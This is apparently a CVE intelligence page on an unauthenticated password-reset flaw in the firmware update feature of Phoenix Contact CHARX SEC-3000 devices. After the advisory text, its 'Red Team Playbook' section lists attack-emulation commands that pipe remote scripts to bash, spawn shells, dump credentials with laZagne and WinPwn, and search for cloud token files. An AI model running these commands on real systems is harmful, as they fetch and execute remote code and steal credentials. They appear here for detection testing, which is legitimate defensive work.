CVE-2024-6788
Overview
This vulnerability is an authentication bypass affecting the firmware update mechanism of PHOENIX CONTACT CHARX SEC-3000 series devices. The root cause lies in the improper access control of the LAN interface firmware update feature, which allows unauthenticated remote attackers to invoke password reset functionality. The affected component is the device's firmware update interface accessible over the local network.
Vulnerability Description
A remote unauthenticated attacker can use the firmware update feature on the LAN interface of the device to reset the password for the predefined, low-privileged user “user-app” to the default password.
Impact
An attacker with network access to the LAN interface can reset the password of the low-privileged user "user-app" without authentication, enabling unauthorized access to the device under that user context. This can facilitate further reconnaissance or lateral movement within the network. The attack requires no user interaction and no prior credentials, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N, with potential to impact confidentiality, integrity, and availability at varying levels.
Solution
PHOENIX CONTACT has released security updates addressing this vulnerability for CHARX SEC-3000 series devices as detailed in advisory VDE-2024-022 (https://cert.vde.com/en/advisories/VDE-2024-022). Users should apply the latest firmware updates for CHARX SEC-3000, SEC-3050, SEC-3100, and SEC-3150 to remediate the issue. Follow the vendor's official patching instructions to ensure the firmware update feature enforces proper authentication controls.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the firmware update feature on specific Phoenix Contact devices presents a critical security risk. This flaw allows an unauthenticated remote attacker to exploit the firmware update mechanism via the LAN interface. By leveraging this vulnerability, the attacker can reset the password for the predefined low-privileged user account, “user-app,” to its default value. This weakness arises from insufficient access controls and inadequate authentication mechanisms during the firmware update process, which should ideally require proper authentication to prevent unauthorized access.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a targeted attack by sending specially crafted requests to the LAN interface of the affected devices. Given that the attacker does not need to be authenticated, this significantly lowers the barrier to entry for potential exploits. Once the password for the “user-app” account is reset, the attacker gains access to the device with limited privileges. However, even low-privileged access can be leveraged to escalate privileges or perform unauthorized actions, such as altering device configurations or accessing sensitive data. This scenario highlights the potential for a multi-stage attack where initial access could lead to further exploitation within the network.
The real-world implications of this vulnerability are substantial, particularly for organizations relying on the affected devices for critical operations. The ability for an attacker to reset user credentials without authentication poses a significant threat to the integrity and confidentiality of the system. In industrial settings, where these devices may control essential infrastructure, the risk escalates further. Unauthorized access could lead to operational disruptions, data breaches, or even safety incidents, resulting in financial losses, reputational damage, and regulatory repercussions. The high CVSS score of 9.8 underscores the severity of this vulnerability, indicating that organizations must prioritize its remediation.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, regular monitoring of network traffic to identify unusual patterns or unauthorized access attempts can help in early detection of exploitation attempts. Additionally, organizations should ensure that firmware updates are conducted in a secure manner, requiring authentication and validation of the update source. It is also critical to enforce strong password policies and regularly update credentials for all user accounts, including the “user-app” account, to minimize the risk of exploitation. Finally, organizations should stay informed about security patches and updates from Phoenix Contact and apply them promptly to mitigate the risk associated with this vulnerability.
In conclusion, the vulnerability related to the firmware update feature in specific Phoenix Contact devices poses a significant threat to organizational security. The ease of exploitation combined with the potential for serious consequences necessitates immediate attention from affected organizations. By implementing robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall cybersecurity posture.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Phoenixcontact | Charx Sec-3000 Firmware | All |
cpe:2.3:o:phoenixcontact:charx_sec-3000_firmware:*:*:*:*:*:*:*:*
|
|
|
Phoenixcontact | Charx Sec-3050 Firmware | All |
cpe:2.3:o:phoenixcontact:charx_sec-3050_firmware:*:*:*:*:*:*:*:*
|
|
|
Phoenixcontact | Charx Sec-3100 Firmware | All |
cpe:2.3:o:phoenixcontact:charx_sec-3100_firmware:*:*:*:*:*:*:*:*
|
|
|
Phoenixcontact | Charx Sec-3150 Firmware | All |
cpe:2.3:o:phoenixcontact:charx_sec-3150_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6788 |
| cert.vde.com |
GitHub CVE
|
https://cert.vde.com/en/advisories/VDE-2024-022 |